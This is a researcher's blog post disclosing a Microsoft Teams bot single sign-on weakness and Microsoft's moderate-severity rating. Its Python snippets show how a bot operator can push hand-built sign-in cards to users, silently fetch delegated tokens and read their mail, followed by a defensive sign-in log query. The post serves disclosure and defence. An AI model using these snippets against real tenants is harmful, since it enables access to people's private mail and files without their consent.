In this article, I share my experience discovering a security bug in Microsoft Teams apps that can undermine the single sign-on (SSO) mechanism.
Introduction
Hello!
I'm Azizkhon Ishankhonov, and I specialize in building solutions using Microsoft technologies.
Previously, I posted an article about AI-bot development with .NET, where I briefly covered authentication and the single sign-on mechanism provided by the Azure Bot Service.
Today, I want to share my findings about a security bug I discovered in MS Teams bots/applications.
In accordance with the coordinated vulnerability disclosure policy, I reported this security bug through the MSRC Researcher Portal. However, Microsoft assessed the case as moderate severity, which means a fix is not an immediate servicing priority according to the Microsoft severity bar.
My personal opinion differs from that of the Microsoft engineers. I believe this vulnerability could serve as a gateway to breach security barriers, allowing unauthorized access to a user's personal/private information, even if an administrator has approved the application.
To make this clear and easy to understand, I want to demonstrate it with real-world samples and cases so that security engineers and tenant administrators can assess the severity and protect their tenants.
Issue
The starting point here is the official samples and their references:
Bot Teams Authentication
Bot SSO Setup

The Microsoft Bot Framework has a great feature that allows for easy integration of the SSO mechanism into an app. While researching this feature, I discovered a flaw. Under certain conditions, it's possible to obtain an access token on behalf of a user without their explicit consent for that specific action.
This felt wrong. Since the Bot Framework API and libraries are open-source, I suspected it might be possible to manipulate the authentication flow. I was right.
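To show what the feature normally looks like from a developer's point of view, here is a minimal sketch of the usual SSO wiring with the Bot Framework SDK for Python. The connection name "GraphConnection" is a placeholder for whatever OAuth connection is configured on the Azure Bot resource.

```python
# Minimal sketch of the standard Bot Framework SSO wiring (Python SDK).
# "GraphConnection" is a placeholder for the OAuth connection configured
# on the Azure Bot resource; the scopes are defined on that connection.
from botbuilder.dialogs import ComponentDialog, WaterfallDialog, WaterfallStepContext
from botbuilder.dialogs.prompts import OAuthPrompt, OAuthPromptSettings


class SsoDialog(ComponentDialog):
    def __init__(self, connection_name: str = "GraphConnection"):
        super().__init__(SsoDialog.__name__)
        # The prompt either exchanges the Teams SSO token silently or
        # falls back to showing a sign-in card to the user.
        self.add_dialog(
            OAuthPrompt(
                OAuthPrompt.__name__,
                OAuthPromptSettings(
                    connection_name=connection_name,
                    title="Sign in",
                    text="Please sign in",
                    timeout=300000,
                ),
            )
        )
        self.add_dialog(WaterfallDialog("main", [self._token_step]))
        self.initial_dialog_id = "main"

    async def _token_step(self, step: WaterfallStepContext):
        # On success, step.result is a TokenResponse whose .token is a
        # delegated access token for the scopes the connection defines.
        return await step.begin_dialog(OAuthPrompt.__name__)
```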
The Core of the Vulnerability
The exploit works by breaking the expected authentication sequence. Here’s how:
Token Exchange: A delegated token obtained for the bot application can be exchanged for a token for another, higher-value application (like Graph API, Power BI, or Dynamics CRM).
Silent Initiation: An attacker does not need to wait for a user to interact with a bot. They can proactively send a specially crafted authentication card directly to the user’s personal chat, and the same approach works in group chats. A sign-in link generated for a personal chat could previously be reused inside a group chat, but after I reported this behavior to MSRC, that type of sign-in card is no longer accepted.
Manual Payloads: The payloads sent to the Bot Framework API can be built by hand, giving an attacker control over the authentication flow (see the sketch after this list).
Bypassed Consent: Once a user has given initial consent to the application, the bot will not ask for consent again for subsequent requests, even if the list of required permissions has changed. Microsoft has since fixed an issue where some apps would not even ask for consent upon installation, which is a positive change.
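To make the "Silent Initiation" and "Manual Payloads" points concrete, below is a hedged sketch of how an operator who holds the bot's credentials could push a hand-built sign-in (OAuth) card into a user's personal chat through the Bot Connector REST API, without the user ever messaging the bot first. The service URL, IDs, and the helper name are placeholders; obtaining the bot's own Bearer token via the client-credentials flow is assumed and not shown.

```python
# Hedged sketch: proactively opening a 1:1 conversation and posting a
# manually crafted OAuth card. All IDs below are placeholders.
import requests

SERVICE_URL = "https://smba.trafficmanager.net/teams/"  # typical Teams service URL
BOT_APP_ID = "<bot-app-id>"
TENANT_ID = "<tenant-id>"
TARGET_USER_ID = "<target user's Teams or AAD object id>"


def send_signin_card(bot_token: str, connection_name: str, sign_in_url: str) -> None:
    headers = {"Authorization": f"Bearer {bot_token}"}

    # 1. Create (or resolve) a personal conversation with the target user.
    conversation = requests.post(
        f"{SERVICE_URL}v3/conversations",
        headers=headers,
        json={
            "bot": {"id": f"28:{BOT_APP_ID}"},
            "members": [{"id": TARGET_USER_ID}],
            "channelData": {"tenant": {"id": TENANT_ID}},
            "isGroup": False,
        },
    ).json()

    # 2. Post a hand-built OAuth card into that conversation.
    activity = {
        "type": "message",
        "from": {"id": f"28:{BOT_APP_ID}"},
        "attachments": [
            {
                "contentType": "application/vnd.microsoft.card.oauth",
                "content": {
                    "text": "Please sign in",
                    "connectionName": connection_name,
                    "buttons": [
                        {"type": "signin", "title": "Sign in", "value": sign_in_url}
                    ],
                },
            }
        ],
    }
    requests.post(
        f"{SERVICE_URL}v3/conversations/{conversation['id']}/activities",
        headers=headers,
        json=activity,
    )
```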
The result is that if someone gains control of a bot, they can potentially access all the resources (API permission scopes) that the bot is authorized to use, even if those permissions are delegated.
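The consent aspect is what makes this dangerous. Once a single consent exists, the Bot Framework user-token service will return a fresh delegated token to anyone presenting the bot's credentials, with no prompt shown to the user. A hedged sketch of that call follows; the endpoint is the public user-token REST API, and the parameter values are placeholders.

```python
# Hedged sketch: silently fetching a user's delegated token from the Bot
# Framework token service after consent has been granted once.
from typing import Optional

import requests

TOKEN_SERVICE = "https://api.botframework.com/api/usertoken/GetToken"


def get_user_token_silently(
    bot_token: str, user_id: str, connection_name: str
) -> Optional[str]:
    resp = requests.get(
        TOKEN_SERVICE,
        headers={"Authorization": f"Bearer {bot_token}"},
        params={
            "userId": user_id,
            "connectionName": connection_name,
            "channelId": "msteams",
        },
    )
    if resp.status_code == 200:
        # The response carries a delegated access token scoped to whatever
        # the OAuth connection requests (e.g. Graph, Power BI, Dynamics).
        return resp.json().get("token")
    return None  # 404 means no cached/consented token exists for this user
```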
Limitations
There are some conditions for this exploit to work:
The malicious bot application must be uploaded to the organization's app store, which requires a certain level of privilege.
Alternatively, the app could be uploaded as a manifest .zip file directly to a user's MS Teams instance, but in that case it would only affect the users of that specific app.
Cases
Let's say that your company wants to build an AI assistant that will help high-level managers make their routines easier. For example, an AI bot that can search through a user's emails, files, Power BI reports, and Dynamics CRM data and provide answers based on the retrieved data.
For tenant administrators, that might not look strange or raise security concerns, since the bot only requires delegated permissions, which are generally assumed to act only with the user's consent.
Unfortunately, the issue described above allows someone who controls the bot to retrieve private, sensitive information on behalf of a user: imagine a file or a Power BI dashboard listing upcoming layoffs, or financial reports prepared for the chairman.
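As an illustration of what "on behalf of a user" means in practice, the sketch below uses such a delegated token to read the user's most recent mail through Microsoft Graph. Nothing here is specific to the vulnerability; it simply shows how far a single silently obtained token reaches once the connection includes a scope like Mail.Read.

```python
# Illustration only: reading a user's inbox with a delegated Graph token
# (requires the Mail.Read scope on the OAuth connection).
import requests


def read_recent_mail(user_access_token: str) -> list[str]:
    resp = requests.get(
        "https://graph.microsoft.com/v1.0/me/messages",
        headers={"Authorization": f"Bearer {user_access_token}"},
        params={"$top": "10", "$select": "subject,from,receivedDateTime"},
    )
    resp.raise_for_status()
    return [message["subject"] for message in resp.json().get("value", [])]
```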
Concerns
I'm mostly concerned about the apps that are pre-installed in MS Teams by default. Potentially, any of them could be used to gain access to private information. There are hundreds of pre-installed applications with high privilege levels, and I don't think tenant administrators have time to review all of them.

Let's review one of the most popular apps (just as a sample), which I believe is used by millions of people around the world:

This implies that if a major vendor like Adobe were compromised or had malicious intent, they could potentially access a competing company's sensitive files, emails, and call data through employees who use the integrated Adobe app in MS Teams.
Detecting Silent Token Requests
To identify which apps are silently requesting tokens, you can go to the sign-in events in the Microsoft Entra ID admin portal. Look for activities like the one in the screenshot below; this activity coincides with the token exchange sequence.
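If you prefer to query the same data programmatically, the sign-in events are also exposed through Microsoft Graph. Below is a hedged sketch; it assumes you already hold a Graph token with AuditLog.Read.All, and the app display name is whichever application you want to inspect.

```python
# Hedged sketch: pulling recent sign-in events for a specific app from the
# Microsoft Graph audit logs (requires AuditLog.Read.All).
import requests

GRAPH = "https://graph.microsoft.com/v1.0"


def recent_sign_ins(admin_access_token: str, app_display_name: str) -> None:
    resp = requests.get(
        f"{GRAPH}/auditLogs/signIns",
        headers={"Authorization": f"Bearer {admin_access_token}"},
        params={
            "$filter": f"appDisplayName eq '{app_display_name}'",
            "$top": "50",
        },
    )
    resp.raise_for_status()
    for event in resp.json().get("value", []):
        # resourceDisplayName shows which API the token was issued for,
        # which is where a silent exchange to Graph/Power BI/etc. shows up.
        print(
            event["createdDateTime"],
            event["appDisplayName"],
            event.get("resourceDisplayName"),
        )
```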

Summary
It would be naive to assume I am the only one who has discovered this vulnerability.
I hope the information provided is a sufficient starting point for users and administrators to take appropriate action to protect their information. I am disappointed with Microsoft's decision not to address this vulnerability immediately. Therefore, for any future security issues I discover, I will likely consider reporting them on alternative platforms rather than exclusively through the Microsoft Security Response Center.
